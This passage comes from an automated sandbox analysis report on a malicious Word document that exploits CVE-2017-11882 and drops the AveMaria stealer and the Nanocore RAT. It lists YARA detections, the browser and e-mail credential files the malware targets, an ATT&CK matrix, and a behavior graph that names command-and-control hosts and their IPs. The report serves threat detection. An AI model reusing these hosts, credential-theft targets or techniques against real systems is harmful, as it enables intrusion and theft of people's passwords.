        Source: C:\Users\user\AppData\Roaming\putty.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct
        Source: C:\Users\user\AppData\Roaming\putty.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Users\user\AppData\Roaming\putty.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Users\user\AppData\Roaming\putty.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct

        Stealing of Sensitive Information:

        barindex
        Yara detected AveMaria stealerShow sources
        Source: Yara matchFile source: 21.2.images.exe.400000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.images.exe.3b52b48.8.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.2.putty.exe.3802b48.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.images.exe.3b52b48.8.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 15.2.putty.exe.400000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 15.2.putty.exe.400000.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.2.putty.exe.3751b08.8.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 10.2.putty.exe.3791b08.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.images.exe.3aa1b08.9.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 21.3.images.exe.6115d8.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 10.2.putty.exe.3842b48.8.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 21.3.images.exe.61381d.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.2.putty.exe.3802b48.7.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 21.2.images.exe.400000.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 13.2.putty.exe.400000.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 10.2.putty.exe.3842b48.8.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 21.3.images.exe.6115d8.8.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000015.00000003.2137169067.0000000000613000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000015.00000002.2353065694.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000015.00000003.2137304291.0000000000607000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.2119294130.0000000002637000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.2122718897.0000000003601000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000015.00000003.2137077371.0000000000603000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.2119646724.00000000025F7000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000003.2118755811.00000000005B6000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000003.2118971999.00000000005BD000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000003.2119027493.00000000005C3000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.2139607287.0000000003911000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000003.2118869644.00000000005B6000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000003.2118769952.00000000005BD000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.2136747408.0000000002947000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000015.00000003.2137213660.0000000000607000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000003.2118879592.00000000005BD000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.2123072051.00000000035C1000.00000004.00000001.sdmp, type: MEMORY
        Yara detected Nanocore RATShow sources
        Source: Yara matchFile source: 34.2.iBCrDCK.i.exe.34ffadc.25.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 34.2.iBCrDCK.i.exe.440000.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 34.2.iBCrDCK.i.exe.34ffadc.25.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 34.2.iBCrDCK.i.exe.34faca6.27.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 34.2.iBCrDCK.i.exe.3504105.26.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 34.2.iBCrDCK.i.exe.368f7f4.28.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 34.2.iBCrDCK.i.exe.444629.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 34.2.iBCrDCK.i.exe.3680f50.30.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 34.2.iBCrDCK.i.exe.400000.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000022.00000002.2359934676.0000000003678000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000024.00000002.2300359769.0000000002491000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000022.00000002.2359482992.00000000034F9000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000024.00000002.2300423782.0000000003499000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000022.00000002.2355475529.00000000024B1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000022.00000002.2353673485.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000022.00000002.2353767111.0000000000440000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000024.00000002.2299296256.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Contains functionality to steal Chrome passwords or cookiesShow sources
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: \Google\Chrome\User Data\Default\Login Data13_2_0040B917
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: \Chromium\User Data\Default\Login Data13_2_0040B917
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: \Google\Chrome\User Data\Default\Login Data15_2_0040B917
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: \Chromium\User Data\Default\Login Data15_2_0040B917
        Contains functionality to steal e-mail passwordsShow sources
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: POP3 Password13_2_004099FF
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: SMTP Password13_2_004099FF
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: IMAP Password13_2_004099FF
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: POP3 Password15_2_004099FF
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: SMTP Password15_2_004099FF
        Source: C:\Users\user\AppData\Roaming\putty.exeCode function: IMAP Password15_2_004099FF
        Tries to harvest and steal browser information (history, passwords, etc)Show sources
        Source: C:\ProgramData\images.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\logins.json
        Source: C:\ProgramData\images.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
        Source: C:\ProgramData\images.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db
        Source: C:\ProgramData\images.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
        Source: C:\ProgramData\images.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db
        Source: C:\ProgramData\images.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db
        Source: Yara matchFile source: 21.2.images.exe.400000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.2.putty.exe.3802b48.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.images.exe.3b52b48.8.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 15.2.putty.exe.400000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 15.2.putty.exe.400000.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.2.putty.exe.3751b08.8.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 10.2.putty.exe.3791b08.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.images.exe.3aa1b08.9.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 21.3.images.exe.6115d8.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 21.2.images.exe.400000.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 13.2.putty.exe.400000.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 10.2.putty.exe.3842b48.8.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 21.3.images.exe.6115d8.8.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000015.00000003.2137169067.0000000000613000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000015.00000002.2353065694.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000015.00000003.2137304291.0000000000607000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.2119294130.0000000002637000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.2122718897.0000000003601000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000015.00000003.2137077371.0000000000603000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.2119646724.00000000025F7000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000003.2118755811.00000000005B6000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000003.2118971999.00000000005BD000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000003.2119027493.00000000005C3000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.2139607287.0000000003911000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000003.2118869644.00000000005B6000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000003.2118769952.00000000005BD000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.2136747408.0000000002947000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000015.00000003.2137213660.0000000000607000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000003.2118879592.00000000005BD000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.2123072051.00000000035C1000.00000004.00000001.sdmp, type: MEMORY

        Remote Access Functionality:

        barindex
        Yara detected AveMaria stealerShow sources
        Source: Yara matchFile source: 21.2.images.exe.400000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.images.exe.3b52b48.8.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.2.putty.exe.3802b48.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.images.exe.3b52b48.8.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 15.2.putty.exe.400000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 15.2.putty.exe.400000.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.2.putty.exe.3751b08.8.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 10.2.putty.exe.3791b08.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.images.exe.3aa1b08.9.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 21.3.images.exe.6115d8.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 10.2.putty.exe.3842b48.8.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 21.3.images.exe.61381d.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.2.putty.exe.3802b48.7.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 21.2.images.exe.400000.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 13.2.putty.exe.400000.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 10.2.putty.exe.3842b48.8.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 21.3.images.exe.6115d8.8.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000015.00000003.2137169067.0000000000613000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000015.00000002.2353065694.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000015.00000003.2137304291.0000000000607000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.2119294130.0000000002637000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.2122718897.0000000003601000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000015.00000003.2137077371.0000000000603000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.2119646724.00000000025F7000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000003.2118755811.00000000005B6000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000003.2118971999.00000000005BD000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000003.2119027493.00000000005C3000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.2139607287.0000000003911000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000003.2118869644.00000000005B6000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000003.2118769952.00000000005BD000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000011.00000002.2136747408.0000000002947000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000015.00000003.2137213660.0000000000607000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000003.2118879592.00000000005BD000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.2123072051.00000000035C1000.00000004.00000001.sdmp, type: MEMORY
        Yara detected Nanocore RATShow sources
        Source: Yara matchFile source: 34.2.iBCrDCK.i.exe.34ffadc.25.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 34.2.iBCrDCK.i.exe.440000.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 34.2.iBCrDCK.i.exe.34ffadc.25.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 34.2.iBCrDCK.i.exe.34faca6.27.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 34.2.iBCrDCK.i.exe.3504105.26.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 34.2.iBCrDCK.i.exe.368f7f4.28.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 34.2.iBCrDCK.i.exe.444629.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 34.2.iBCrDCK.i.exe.3680f50.30.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 34.2.iBCrDCK.i.exe.400000.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000022.00000002.2359934676.0000000003678000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000024.00000002.2300359769.0000000002491000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000022.00000002.2359482992.00000000034F9000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000024.00000002.2300423782.0000000003499000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000022.00000002.2355475529.00000000024B1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000022.00000002.2353673485.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000022.00000002.2353767111.0000000000440000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000024.00000002.2299296256.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: C:\ProgramData\images.exeCode function: 21_3_04253030 sqlite3_clear_bindings,_memset,21_3_04253030
        Source: C:\ProgramData\images.exeCode function: 21_3_042550E0 sqlite3_bind_parameter_index,21_3_042550E0
        Source: C:\ProgramData\images.exeCode function: 21_3_042552D0 sqlite3_transfer_bindings,21_3_042552D0
        Source: C:\ProgramData\images.exeCode function: 21_3_04254C20 sqlite3_bind_int,21_3_04254C20

        Mitre Att&ck Matrix

        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid AccountsWindows Management Instrumentation1LSASS Driver2LSASS Driver2Disable or Modify Tools11OS Credential Dumping3System Time Discovery12Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer33Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationEndpoint Denial of Service1
        Default AccountsScripting2Create Account11Access Token Manipulation1Deobfuscate/Decode Files or Information1Input Capture121System Service Discovery1Remote Desktop ProtocolData from Local System1Exfiltration Over BluetoothEncrypted Channel2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsNative API1Windows Service11Windows Service11Scripting2Credentials In Files1File and Directory Discovery5SMB/Windows Admin SharesInput Capture121Automated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsShared Modules1Scheduled Task/Job1Process Injection622Obfuscated Files or Information4NTDSSystem Information Discovery27Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
        Cloud AccountsExploitation for Client Execution33Registry Run Keys / Startup Folder1Scheduled Task/Job1Software Packing3LSA SecretsSecurity Software Discovery331SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol122Manipulate Device CommunicationManipulate App Store Rankings or Ratings
        Replication Through Removable MediaCommand and Scripting Interpreter11Rc.commonRegistry Run Keys / Startup Folder1Masquerading23Cached Domain CredentialsVirtualization/Sandbox Evasion21VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
        External Remote ServicesScheduled Task/Job1Startup ItemsStartup ItemsModify Registry1DCSyncProcess Discovery3Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
        Drive-by CompromiseService Execution2Scheduled Task/JobScheduled Task/JobVirtualization/Sandbox Evasion21Proc FilesystemApplication Window Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
        Exploit Public-Facing ApplicationPowerShell3At (Linux)At (Linux)Access Token Manipulation1/etc/passwd and /etc/shadowRemote System Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
        Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Process Injection622Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
        Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronHidden Files and Directories1Input CapturePermission Groups DiscoveryReplication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
        Compromise Software Supply ChainUnix ShellLaunchdLaunchdHidden Users2KeyloggingLocal GroupsComponent Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 457815 Sample: NEW PO1100372954 -.doc Startdate: 02/08/2021 Architecture: WINDOWS Score: 100 98 hhjhtggfr.duckdns.org 2->98 120 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->120 122 Malicious sample detected (through community Yara rule) 2->122 124 Antivirus detection for URL or domain 2->124 126 22 other signatures 2->126 13 WINWORD.EXE 305 48 2->13         started        18 drvinst.exe 2->18         started        20 rdpdr.sys 2->20         started        22 3 other processes 2->22 signatures3 process4 dnsIp5 110 hhjhtggfr.duckdns.org 203.159.80.186, 49165, 49166, 49167 LOVESERVERSGB Netherlands 13->110 112 newhosteeeee.ydns.eu 13->112 90 C:\Users\user\AppData\Local\...\putty[1].exe, PE32 13->90 dropped 92 C:\Users\user\AppData\...\abdtfhghgdghgh .ScT, data 13->92 dropped 94 C:\Users\user\AppData\Local\...\FLD93F.tmp, 370 13->94 dropped 96 C:\Users\user\AppData\Local\...\11DB366A.png, 370 13->96 dropped 164 Document exploit detected (creates forbidden files) 13->164 166 Suspicious powershell command line found 13->166 168 Tries to download and execute files (via powershell) 13->168 170 2 other signatures 13->170 24 powershell.exe 7 13->24         started        28 powershell.exe 7 13->28         started        30 powershell.exe 12 7 13->30         started        33 3 other processes 13->33 file6 signatures7 process8 dnsIp9 106 newhosteeeee.ydns.eu 24->106 88 C:\Users\user\AppData\Roaming\putty.exe, PE32 24->88 dropped 35 putty.exe 1 7 24->35         started        38 putty.exe 2 28->38         started        108 newhosteeeee.ydns.eu 30->108 154 Powershell drops PE file 30->154 156 Injects files into Windows application 33->156 file10 signatures11 process12 signatures13 128 Multi AV Scanner detection for dropped file 35->128 130 Machine Learning detection for dropped file 35->130 132 Contains functionality to inject threads in other processes 35->132 136 2 other signatures 35->136 40 putty.exe 4 4 35->40         started        134 Injects a PE file into a foreign processes 38->134 44 putty.exe 38->44         started        46 putty.exe 38->46         started        48 putty.exe 38->48         started        process14 file15 78 C:\ProgramData\images.exe, PE32 40->78 dropped 140 Increases the number of concurrent connection per server for Internet Explorer 40->140 142 Hides that the sample has been downloaded from the Internet (zone.identifier) 40->142 50 images.exe 40->50         started        53 cmd.exe 40->53         started        signatures16 process17 signatures18 114 Multi AV Scanner detection for dropped file 50->114 116 Machine Learning detection for dropped file 50->116 118 Injects a PE file into a foreign processes 50->118 55 images.exe 50->55         started        60 reg.exe 53->60         started        process19 dnsIp20 102 hutyrtit.ydns.eu 203.159.80.165, 49169, 80 LOVESERVERSGB Netherlands 55->102 104 sdafsdffssffs.ydns.eu 55->104 80 C:\Users\user\AppData\Roaming\iBCrDCK.i.exe, PE32 55->80 dropped 82 C:\Users\user\AppData\Local\...\microC[1].exe, PE32 55->82 dropped 84 C:\Program Files\Microsoft DN1\sqlmap.dll, PE32+ 55->84 dropped 86 C:\Windows\System32\rfxvmt.dll, PE32+ 55->86 dropped 144 Hides user accounts 55->144 146 Tries to harvest and steal browser information (history, passwords, etc) 55->146 148 Writes to foreign memory regions 55->148 152 3 other signatures 55->152 62 iBCrDCK.i.exe 55->62         started        65 cmd.exe 55->65         started        150 Creates an undocumented autostart registry key 60->150 file21 signatures22 process23 signatures24 158 Multi AV Scanner detection for dropped file 62->158 160 Machine Learning detection for dropped file 62->160 162 Injects a PE file into a foreign processes 62->162 67 iBCrDCK.i.exe 62->67         started        72 iBCrDCK.i.exe 62->72         started        process25 dnsIp26 100 hhjhtggfr.duckdns.org 67->100 74 C:\Program Files (x86)\...\smtpsvc.exe, PE32 67->74 dropped 76 C:\Users\user\AppData\Roaming\...\run.dat, International 67->76 dropped 138 Hides that the sample has been downloaded from the Internet (zone.identifier) 67->138 file27 signatures28

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.

        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        NEW PO1100372954 -.doc24%ReversingLabsScript.Exploit.CVE-2017-11882

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Program Files (x86)\SMTP Service\smtpsvc.exe100%Joe Sandbox ML
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\microC[1].exe100%Joe Sandbox ML
        C:\Users\user\AppData\Roaming\iBCrDCK.i.exe100%Joe Sandbox ML
        C:\ProgramData\images.exe100%Joe Sandbox ML
        C:\Users\user\AppData\Roaming\putty.exe100%Joe Sandbox ML
